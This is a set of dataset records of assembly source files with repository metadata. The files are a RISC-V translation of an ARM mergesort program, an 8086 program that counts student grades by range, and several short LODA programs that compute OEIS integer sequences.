00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | b6ebfa730308b83b484a70629ecc51a881f6b1d7 | Assemblycode:Assembly | {"size": 14904, "ext": "asm", "max_stars_repo_path": "docs/asm_examples/large_mergesort.asm", "max_stars_repo_name": "schorrm/arm2riscv", "max_stars_repo_stars_event_min_datetime": "2020-07-07T13:08:26.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-29T23:12:37.000Z", "max_issues_repo_path": "docs/asm_examples/large_mergesort.asm", "max_issues_repo_name": "schorrm/arm2riscv", "max_issues_repo_issues_event_min_datetime": "2020-04-05T07:17:22.000Z", "max_issues_repo_issues_event_max_datetime": "2021-06-27T22:33:25.000Z", "max_forks_repo_path": "docs/asm_examples/large_mergesort.asm", "max_forks_repo_name": "schorrm/arm2riscv", "max_forks_repo_forks_event_min_datetime": "2021-06-19T12:38:45.000Z", "max_forks_repo_forks_event_max_datetime": "2021-06-19T12:38:45.000Z"} | {"max_stars_count": 8, "max_issues_count": 2, "max_forks_count": 1, "avg_line_length": 18.4913151365, "max_line_length": 61, "alphanum_fraction": 0.5701154053} | .file "large_mergesort.c"
.section .tdata
REG_BANK:
.dword 0
.dword 0
.dword 0
.dword 0
.dword 0
.dword 0
.dword 0
.dword 0
.text
.align 2
.global merge
.type merge, %function
merge:
# stp x29, x30, [sp, -128]!
sd x8, -128(sp)
sd ra, -120(sp)
addi sp, sp, -128 # writeback
# add x29, sp, 0
addi x8, sp, 0
# str x19, [sp, 16]
sd x18, 16(sp)
# str x0, [x29, 56]
sd x10, 56(x8)
# str w1, [x29, 52]
sw x11, 52(x8)
# str w2, [x29, 48]
sw x12, 48(x8)
# str w3, [x29, 44]
sw x13, 44(x8)
# adrp x0, :got:__stack_chk_guard
lui x10, %hi(__stack_chk_guard)
# ldr x0, [x0, #:got_lo12:__stack_chk_guard]
add x10, x10, %lo(__stack_chk_guard) # load from GOT -> ADD!
# ldr x1, [x0]
ld x11, 0(x10)
# str x1, [x29, 120]
sd x11, 120(x8)
# mov x1,0
li x11, 0
# mov x0, sp
mv x10, sp
# mov x3, x0
mv x13, x10
# ldr w1, [x29, 48]
lw x11, 48(x8)
# ldr w0, [x29, 52]
lw x10, 52(x8)
# sub w0, w1, w0
subw x10, x11, x10
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 80]
sw x10, 80(x8)
# ldr w1, [x29, 44]
lw x11, 44(x8)
# ldr w0, [x29, 48]
lw x10, 48(x8)
# sub w0, w1, w0
subw x10, x11, x10
# str w0, [x29, 84]
sw x10, 84(x8)
# ldr w0, [x29, 80]
lw x10, 80(x8)
# sxtw x1, w0
sext.w x11, x10
# sub x1, x1, #1
addi x11, x11, -1
# str x1, [x29, 88]
sd x11, 88(x8)
# sxtw x1, w0
sext.w x11, x10
# mov x18, x1
ld x22, 8(x21) # load of mmapped register
mv x22, x11
sd x22, 8(x21) # store of mmapped register
# mov x19, 0
li x18, 0
# lsr x1, x18, 59
ld x22, 8(x21) # load of mmapped register
srli x11, x22, 59
# lsl x11, x19, 5
slli x7, x18, 5
# orr x11, x1, x11
or x7, x11, x7
# lsl x10, x18, 5
ld x22, 8(x21) # load of mmapped register
slli x6, x22, 5
# sxtw x1, w0
sext.w x11, x10
# mov x16, x1
mv x27, x11
# mov x17, 0
ld x22, 0(x21) # load of mmapped register
li x22, 0
sd x22, 0(x21) # store of mmapped register
# lsr x1, x16, 59
srli x11, x27, 59
# lsl x9, x17, 5
ld x22, 0(x21) # load of mmapped register
slli x5, x22, 5
# orr x9, x1, x9
or x5, x11, x5
# lsl x8, x16, 5
slli x9, x27, 5
# sxtw x0, w0
sext.w x10, x10
# lsl x0, x0, 2
slli x10, x10, 2
# add x0, x0, 3
addi x10, x10, 3
# add x0, x0, 15
addi x10, x10, 15
# lsr x0, x0, 4
srli x10, x10, 4
# lsl x0, x0, 4
slli x10, x10, 4
# sub sp, sp, x0
sub sp, sp, x10
# mov x0, sp
mv x10, sp
# add x0, x0, 3
addi x10, x10, 3
# lsr x0, x0, 2
srli x10, x10, 2
# lsl x0, x0, 2
slli x10, x10, 2
# str x0, [x29, 96]
sd x10, 96(x8)
# ldr w0, [x29, 84]
lw x10, 84(x8)
# sxtw x1, w0
sext.w x11, x10
# sub x1, x1, #1
addi x11, x11, -1
# str x1, [x29, 104]
sd x11, 104(x8)
# sxtw x1, w0
sext.w x11, x10
# mov x14, x1
mv x30, x11
# mov x15, 0
li x31, 0
# lsr x1, x14, 59
srli x11, x30, 59
# lsl x7, x15, 5
slli x17, x31, 5
# orr x7, x1, x7
or x17, x11, x17
# lsl x6, x14, 5
slli x16, x30, 5
# sxtw x1, w0
sext.w x11, x10
# mov x12, x1
mv x28, x11
# mov x13, 0
li x29, 0
# lsr x1, x12, 59
srli x11, x28, 59
# lsl x5, x13, 5
slli x15, x29, 5
# orr x5, x1, x5
or x15, x11, x15
# lsl x4, x12, 5
slli x14, x28, 5
# sxtw x0, w0
sext.w x10, x10
# lsl x0, x0, 2
slli x10, x10, 2
# add x0, x0, 3
addi x10, x10, 3
# add x0, x0, 15
addi x10, x10, 15
# lsr x0, x0, 4
srli x10, x10, 4
# lsl x0, x0, 4
slli x10, x10, 4
# sub sp, sp, x0
sub sp, sp, x10
# mov x0, sp
mv x10, sp
# add x0, x0, 3
addi x10, x10, 3
# lsr x0, x0, 2
srli x10, x10, 2
# lsl x0, x0, 2
slli x10, x10, 2
# str x0, [x29, 112]
sd x10, 112(x8)
# str wzr, [x29, 76]
sw x0, 76(x8)
# b .L2
j .L2
.L3:
# ldr w1, [x29, 52]
lw x11, 52(x8)
# ldr w0, [x29, 76]
lw x10, 76(x8)
# add w0, w1, w0
addw x10, x11, x10
# sxtw x0, w0
sext.w x10, x10
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr w2, [x0]
lw x12, 0(x10)
# ldr x0, [x29, 96]
ld x10, 96(x8)
# ldrsw x1, [x29, 76]
lw x11, 76(x8)
# str w2, [x0, x1, lsl 2]
slli x26, x11, 2
add x26, x26, x10 # converting offset register to add
sw x12, 0(x26)
# ldr w0, [x29, 76]
lw x10, 76(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 76]
sw x10, 76(x8)
.L2:
# ldr w1, [x29, 76]
lw x11, 76(x8)
# ldr w0, [x29, 80]
lw x10, 80(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L3
blt x25, x0, .L3
# str wzr, [x29, 72]
sw x0, 72(x8)
# b .L4
j .L4
.L5:
# ldr w0, [x29, 48]
lw x10, 48(x8)
# add w1, w0, 1
addiw x11, x10, 1
# ldr w0, [x29, 72]
lw x10, 72(x8)
# add w0, w1, w0
addw x10, x11, x10
# sxtw x0, w0
sext.w x10, x10
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr w2, [x0]
lw x12, 0(x10)
# ldr x0, [x29, 112]
ld x10, 112(x8)
# ldrsw x1, [x29, 72]
lw x11, 72(x8)
# str w2, [x0, x1, lsl 2]
slli x26, x11, 2
add x26, x26, x10 # converting offset register to add
sw x12, 0(x26)
# ldr w0, [x29, 72]
lw x10, 72(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 72]
sw x10, 72(x8)
.L4:
# ldr w1, [x29, 72]
lw x11, 72(x8)
# ldr w0, [x29, 84]
lw x10, 84(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L5
blt x25, x0, .L5
# str wzr, [x29, 76]
sw x0, 76(x8)
# str wzr, [x29, 72]
sw x0, 72(x8)
# ldr w0, [x29, 52]
lw x10, 52(x8)
# str w0, [x29, 68]
sw x10, 68(x8)
# b .L6
j .L6
.L10:
# ldr x0, [x29, 96]
ld x10, 96(x8)
# ldrsw x1, [x29, 76]
lw x11, 76(x8)
# ldr w1, [x0, x1, lsl 2]
slli x26, x11, 2
add x26, x26, x10 # converting offset register to add
lw x11, 0(x26)
# ldr x0, [x29, 112]
ld x10, 112(x8)
# ldrsw x2, [x29, 72]
lw x12, 72(x8)
# ldr w0, [x0, x2, lsl 2]
slli x26, x12, 2
add x26, x26, x10 # converting offset register to add
lw x10, 0(x26)
# cmp w1, w0
sub x25, x11, x10
# bgt .L7
bgt x25, x0, .L7
# ldrsw x0, [x29, 68]
lw x10, 68(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr x1, [x29, 96]
ld x11, 96(x8)
# ldrsw x2, [x29, 76]
lw x12, 76(x8)
# ldr w1, [x1, x2, lsl 2]
slli x26, x12, 2
add x26, x26, x11 # converting offset register to add
lw x11, 0(x26)
# str w1, [x0]
sw x11, 0(x10)
# ldr w0, [x29, 76]
lw x10, 76(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 76]
sw x10, 76(x8)
# b .L8
j .L8
.L7:
# ldrsw x0, [x29, 68]
lw x10, 68(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr x1, [x29, 112]
ld x11, 112(x8)
# ldrsw x2, [x29, 72]
lw x12, 72(x8)
# ldr w1, [x1, x2, lsl 2]
slli x26, x12, 2
add x26, x26, x11 # converting offset register to add
lw x11, 0(x26)
# str w1, [x0]
sw x11, 0(x10)
# ldr w0, [x29, 72]
lw x10, 72(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 72]
sw x10, 72(x8)
.L8:
# ldr w0, [x29, 68]
lw x10, 68(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 68]
sw x10, 68(x8)
.L6:
# ldr w1, [x29, 76]
lw x11, 76(x8)
# ldr w0, [x29, 80]
lw x10, 80(x8)
# cmp w1, w0
sub x25, x11, x10
# bge .L11
bge x25, x0, .L11
# ldr w1, [x29, 72]
lw x11, 72(x8)
# ldr w0, [x29, 84]
lw x10, 84(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L10
blt x25, x0, .L10
# b .L11
j .L11
.L12:
# ldrsw x0, [x29, 68]
lw x10, 68(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr x1, [x29, 96]
ld x11, 96(x8)
# ldrsw x2, [x29, 76]
lw x12, 76(x8)
# ldr w1, [x1, x2, lsl 2]
slli x26, x12, 2
add x26, x26, x11 # converting offset register to add
lw x11, 0(x26)
# str w1, [x0]
sw x11, 0(x10)
# ldr w0, [x29, 76]
lw x10, 76(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 76]
sw x10, 76(x8)
# ldr w0, [x29, 68]
lw x10, 68(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 68]
sw x10, 68(x8)
.L11:
# ldr w1, [x29, 76]
lw x11, 76(x8)
# ldr w0, [x29, 80]
lw x10, 80(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L12
blt x25, x0, .L12
# b .L13
j .L13
.L14:
# ldrsw x0, [x29, 68]
lw x10, 68(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 56]
ld x11, 56(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr x1, [x29, 112]
ld x11, 112(x8)
# ldrsw x2, [x29, 72]
lw x12, 72(x8)
# ldr w1, [x1, x2, lsl 2]
slli x26, x12, 2
add x26, x26, x11 # converting offset register to add
lw x11, 0(x26)
# str w1, [x0]
sw x11, 0(x10)
# ldr w0, [x29, 72]
lw x10, 72(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 72]
sw x10, 72(x8)
# ldr w0, [x29, 68]
lw x10, 68(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 68]
sw x10, 68(x8)
.L13:
# ldr w1, [x29, 72]
lw x11, 72(x8)
# ldr w0, [x29, 84]
lw x10, 84(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L14
blt x25, x0, .L14
# mov sp, x3
mv sp, x13
# nop
nop
# adrp x0, :got:__stack_chk_guard
lui x10, %hi(__stack_chk_guard)
# ldr x0, [x0, #:got_lo12:__stack_chk_guard]
add x10, x10, %lo(__stack_chk_guard) # load from GOT -> ADD!
# ldr x1, [x29, 120]
ld x11, 120(x8)
# ldr x0, [x0]
ld x10, 0(x10)
# eor x0, x1, x0
xor x10, x11, x10
# cmp x0, 0
addi x25, x10, 0
# beq .L15
beq x25, x0, .L15
# bl __stack_chk_fail
call __stack_chk_fail
.L15:
# add sp, x29, 0
addi sp, x8, 0
# ldr x19, [sp, 16]
ld x18, 16(sp)
# ldp x29, x30, [sp], 128
ld x8, 0(sp)
ld ra, 8(sp)
addi sp, sp, 128 # writeback
# ret
ret
.size merge, .-merge
.align 2
.global mergeSort
.type mergeSort, %function
mergeSort:
# stp x29, x30, [sp, -48]!
sd x8, -48(sp)
sd ra, -40(sp)
addi sp, sp, -48 # writeback
# add x29, sp, 0
addi x8, sp, 0
# str x0, [x29, 24]
sd x10, 24(x8)
# str w1, [x29, 20]
sw x11, 20(x8)
# str w2, [x29, 16]
sw x12, 16(x8)
# ldr w1, [x29, 20]
lw x11, 20(x8)
# ldr w0, [x29, 16]
lw x10, 16(x8)
# cmp w1, w0
sub x25, x11, x10
# bge .L18
bge x25, x0, .L18
# ldr w1, [x29, 16]
lw x11, 16(x8)
# ldr w0, [x29, 20]
lw x10, 20(x8)
# sub w0, w1, w0
subw x10, x11, x10
# lsr w1, w0, 31
srliw x11, x10, 31
# add w0, w1, w0
addw x10, x11, x10
# asr w0, w0, 1
sraiw x10, x10, 1
# mov w1, w0
mv x11, x10
# ldr w0, [x29, 20]
lw x10, 20(x8)
# add w0, w0, w1
addw x10, x10, x11
# str w0, [x29, 44]
sw x10, 44(x8)
# ldr w2, [x29, 44]
lw x12, 44(x8)
# ldr w1, [x29, 20]
lw x11, 20(x8)
# ldr x0, [x29, 24]
ld x10, 24(x8)
# bl mergeSort
call mergeSort
# ldr w0, [x29, 44]
lw x10, 44(x8)
# add w0, w0, 1
addiw x10, x10, 1
# ldr w2, [x29, 16]
lw x12, 16(x8)
# mov w1, w0
mv x11, x10
# ldr x0, [x29, 24]
ld x10, 24(x8)
# bl mergeSort
call mergeSort
# ldr w3, [x29, 16]
lw x13, 16(x8)
# ldr w2, [x29, 44]
lw x12, 44(x8)
# ldr w1, [x29, 20]
lw x11, 20(x8)
# ldr x0, [x29, 24]
ld x10, 24(x8)
# bl merge
call merge
.L18:
# nop
nop
# ldp x29, x30, [sp], 48
ld x8, 0(sp)
ld ra, 8(sp)
addi sp, sp, 48 # writeback
# ret
ret
.size mergeSort, .-mergeSort
.section .rodata
.align 3
.LC0:
.string "%d "
.text
.align 2
.global printArray
.type printArray, %function
printArray:
# stp x29, x30, [sp, -48]!
sd x8, -48(sp)
sd ra, -40(sp)
addi sp, sp, -48 # writeback
# add x29, sp, 0
addi x8, sp, 0
# str x0, [x29, 24]
sd x10, 24(x8)
# str w1, [x29, 20]
sw x11, 20(x8)
# str wzr, [x29, 44]
sw x0, 44(x8)
# b .L20
j .L20
.L21:
# ldrsw x0, [x29, 44]
lw x10, 44(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# ldr x1, [x29, 24]
ld x11, 24(x8)
# add x0, x1, x0
add x10, x11, x10
# ldr w1, [x0]
lw x11, 0(x10)
# adrp x0, .LC0
lui x10, %hi(.LC0)
# add x0, x0, :lo12:.LC0
add x10, x10, %lo(.LC0)
# bl printf
call printf
# ldr w0, [x29, 44]
lw x10, 44(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 44]
sw x10, 44(x8)
.L20:
# ldr w1, [x29, 44]
lw x11, 44(x8)
# ldr w0, [x29, 20]
lw x10, 20(x8)
# cmp w1, w0
sub x25, x11, x10
# blt .L21
blt x25, x0, .L21
# mov w0, 10
li x10, 10
# bl putchar
call putchar
# nop
nop
# ldp x29, x30, [sp], 48
ld x8, 0(sp)
ld ra, 8(sp)
addi sp, sp, 48 # writeback
# ret
ret
.size printArray, .-printArray
.section .rodata
.align 3
.LC1:
.string "Given array is "
.align 3
.LC2:
.string "\nSorted array is "
.text
.align 2
.global main
.type main, %function
main:
la x21, REG_BANK
# mov x16, 40032
li x27, 40032
# sub sp, sp, x16
sub sp, sp, x27
# stp x29, x30, [sp]
sd x8, 0(sp)
sd ra, 8(sp)
# add x29, sp, 0
addi x8, sp, 0
# adrp x0, :got:__stack_chk_guard
lui x10, %hi(__stack_chk_guard)
# ldr x0, [x0, #:got_lo12:__stack_chk_guard]
add x10, x10, %lo(__stack_chk_guard) # load from GOT -> ADD!
# add x1, x29, 32768
li x26, 32768 # synthesis of oversized immediate
add x11, x8, x26
# ldr x2, [x0]
ld x12, 0(x10)
# str x2, [x1, 7256]
li x26, 7256 # synthesis of oversized immediate
add x26, x26, x11 # converting offset register to add
sd x12, 0(x26)
# mov x2,0
li x12, 0
# mov w0, 1234
li x10, 1234
# bl srand
call srand
# str wzr, [x29, 16]
sw x0, 16(x8)
# b .L23
j .L23
.L24:
# bl random
call random
# mov w2, w0
mv x12, x10
# ldrsw x0, [x29, 16]
lw x10, 16(x8)
# lsl x0, x0, 2
slli x10, x10, 2
# add x1, x29, 24
addi x11, x8, 24
# str w2, [x1, x0]
add x26, x10, x11 # converting offset register to add
sw x12, 0(x26)
# ldr w0, [x29, 16]
lw x10, 16(x8)
# add w0, w0, 1
addiw x10, x10, 1
# str w0, [x29, 16]
sw x10, 16(x8)
.L23:
# ldr w1, [x29, 16]
lw x11, 16(x8)
# mov w0, 9999
li x10, 9999
# cmp w1, w0
sub x25, x11, x10
# ble .L24
ble x25, x0, .L24
# mov w0, 10000
li x10, 10000
# str w0, [x29, 20]
sw x10, 20(x8)
# adrp x0, .LC1
lui x10, %hi(.LC1)
# add x0, x0, :lo12:.LC1
add x10, x10, %lo(.LC1)
# bl puts
call puts
# add x0, x29, 24
addi x10, x8, 24
# ldr w1, [x29, 20]
lw x11, 20(x8)
# bl printArray
call printArray
# ldr w0, [x29, 20]
lw x10, 20(x8)
# sub w1, w0, #1
addiw x11, x10, -1
# add x0, x29, 24
addi x10, x8, 24
# mov w2, w1
mv x12, x11
# mov w1, 0
li x11, 0
# bl mergeSort
call mergeSort
# adrp x0, .LC2
lui x10, %hi(.LC2)
# add x0, x0, :lo12:.LC2
add x10, x10, %lo(.LC2)
# bl puts
call puts
# add x0, x29, 24
addi x10, x8, 24
# ldr w1, [x29, 20]
lw x11, 20(x8)
# bl printArray
call printArray
# mov w0, 0
li x10, 0
# adrp x1, :got:__stack_chk_guard
lui x11, %hi(__stack_chk_guard)
# ldr x1, [x1, #:got_lo12:__stack_chk_guard]
add x11, x11, %lo(__stack_chk_guard) # load from GOT -> ADD!
# add x2, x29, 32768
li x26, 32768 # synthesis of oversized immediate
add x12, x8, x26
# ldr x3, [x2, 7256]
li x26, 7256 # synthesis of oversized immediate
add x26, x26, x12 # converting offset register to add
ld x13, 0(x26)
# ldr x1, [x1]
ld x11, 0(x11)
# eor x1, x3, x1
xor x11, x13, x11
# cmp x1, 0
addi x25, x11, 0
# beq .L26
beq x25, x0, .L26
# bl __stack_chk_fail
call __stack_chk_fail
.L26:
# ldp x29, x30, [sp]
ld x8, 0(sp)
ld ra, 8(sp)
# mov x16, 40032
li x27, 40032
# add sp, sp, x16
add sp, sp, x27
# ret
ret
.size main, .-main
.ident "GCC: (Ubuntu/Linaro 7.4.0-1ubuntu1~18.04.1) 7.4.0"
.section .note.GNU-stack,"",@progbits
|
||||
TheStack | 3e206ec9cc0a0e9ebaacc7d69a2a268b233ecd07 | Assemblycode:Assembly | {"size": 1540, "ext": "asm", "max_stars_repo_path": "GradeAlloc.asm", "max_stars_repo_name": "CallMeMengMeng/ASSEMBLY-LANGUAGE", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "GradeAlloc.asm", "max_issues_repo_name": "CallMeMengMeng/ASSEMBLY-LANGUAGE", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "GradeAlloc.asm", "max_forks_repo_name": "CallMeMengMeng/ASSEMBLY-LANGUAGE", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 23.6923076923, "max_line_length": 91, "alphanum_fraction": 0.6318181818} | ; ALLOCATE THE GRADES OF 12 STUDENTS TO SIX SECTIONS: <60, 60-69, 70-79, 80-89, 90-99, 100
DATA SEGMENT
TABLE DB 76,69,82,90,54,42,59,68,71,86,91,100 ; STORE GRADES OF TWELVE STUDENTS
S10 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS 100
S9 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS BETWEEN 90 TO 99
S8 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS BETWEEN 80 TO 89
S7 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS BETWEEN 70 TO 79
S6 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS BETWEEN 60 TO 69
S5 DB (0) ; STORE THE NUMBER OF STUDENTS WHOSE GRADE IS BELOW 60
LEN EQU S10-TABLE ; THE QUANTITY OF STUDENTS
DATA ENDS
CODE SEGMENT
ASSUME DS:DATA,CS:CODE
START: MOV AX,DATA
MOV DS,AX
MOV CX,LEN
LEA SI,TABLE ; GET THE START ADDRESS OF TABLE
NEXT: MOV AL,[SI] ; MOVE THE FIRST GRADE TO AL
CMP AL,59 ; COMPARE WITH 59
JNA AGAIN1 ; IF GRADE IS NOT ABOVE 59 JUMP TO AGAIN1
CMP AL,69 ; 60-69?
JNA AGAIN2
CMP AL,79 ; 70-79?
JNA AGAIN3
CMP AL,89 ; 80-89?
JNA AGAIN4
CMP AL,99 ; 90-99?
JNA AGAIN5
CMP AL,100 ; 100?
JNA AGAIN6
AGAIN1: INC S5
INC SI
DEC CX
JNZ NEXT
HLT
AGAIN2: INC S6
INC SI
DEC CX
JNZ NEXT
HLT
AGAIN3: INC S7
INC SI
DEC CX
JNZ NEXT
HLT
AGAIN4: INC S8
INC SI
DEC CX
JNZ NEXT
HLT
AGAIN5: INC S9
INC SI
DEC CX
JNZ NEXT
HLT
AGAIN6: INC S10
INC SI
DEC CX
JNZ NEXT
HLT
CODE ENDS
END START |
||||
TheStack | 91e952191dd239f3f49e1a52ee1713db29f1a4fb | Assemblycode:Assembly | {"size": 447, "ext": "asm", "max_stars_repo_path": "oeis/204/A204000.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/204/A204000.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/204/A204000.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 23.5263157895, "max_line_length": 198, "alphanum_fraction": 0.5995525727} | ; A204000: Symmetric matrix based on f(i,j)=min{i(j+1)-1,j(i+1)-1}, by antidiagonals.
; Submitted by Jon Maiga
; 1,2,2,3,5,3,4,7,7,4,5,9,11,9,5,6,11,14,14,11,6,7,13,17,19,17,13,7,8,15,20,23,23,20,15,8,9,17,23,27,29,27,23,17,9,10,19,26,31,34,34,31,26,19,10,11,21,29,35,39,41,39,35,29,21,11,12,23,32,39,44,47,47
lpb $0
add $1,1
sub $0,$1
mov $2,$1
sub $2,$0
lpe
min $0,$2
add $1,2
sub $1,$0
mov $2,$1
mul $2,$0
add $2,$1
mov $0,$2
sub $0,1
|
||||
TheStack | ae6335a574b9ce2cedb0ac174ab9d43e578cb69d | Assemblycode:Assembly | {"size": 314, "ext": "asm", "max_stars_repo_path": "programs/oeis/336/A336483.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/336/A336483.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/336/A336483.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 31.4, "max_line_length": 201, "alphanum_fraction": 0.6178343949} | ; A336483: Floor(n/10) + (5 times last digit of n).
; 0,5,10,15,20,25,30,35,40,45,1,6,11,16,21,26,31,36,41,46,2,7,12,17,22,27,32,37,42,47,3,8,13,18,23,28,33,38,43,48,4,9,14,19,24,29,34,39,44,49,5,10,15,20,25,30,35,40,45,50,6,11,16,21,26,31,36,41,46,51,7
mov $1,$0
mod $0,10
mul $0,5
div $1,10
add $1,$0
mov $0,$1
|
||||
TheStack | 72cf7690616ebd20ef0269512872ca2962ffbf9d | Assemblycode:Assembly | {"size": 419, "ext": "asm", "max_stars_repo_path": "oeis/040/A040633.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/040/A040633.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/040/A040633.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 34.9166666667, "max_line_length": 190, "alphanum_fraction": 0.630071599} | ; A040633: Continued fraction for sqrt(659).
; Submitted by Jon Maiga
; 25,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2,25,2,1,50,1,2
seq $0,10144 ; Continued fraction for sqrt(59).
seq $0,90771 ; Numbers that are congruent to {1, 9} mod 10.
mov $1,$0
mul $1,12
div $1,15
mov $0,$1
sub $0,6
|
||||
TheStack | 0d7a91c9e2d83e181baf510ab39b8d43a8ba67d4 | Assemblycode:Assembly | {"size": 10504, "ext": "asm", "max_stars_repo_path": "P6/data_P6_2/MDTest61.asm", "max_stars_repo_name": "alxzzhou/BUAA_CO_2020", "max_stars_repo_stars_event_min_datetime": "2022-01-23T09:24:47.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-23T09:24:47.000Z", "max_issues_repo_path": "P6/data_P6_2/MDTest61.asm", "max_issues_repo_name": "alxzzhou/BUAA_CO_2020", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "P6/data_P6_2/MDTest61.asm", "max_forks_repo_name": "alxzzhou/BUAA_CO_2020", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 11.802247191, "max_line_length": 18, "alphanum_fraction": 0.5649276466} | ori 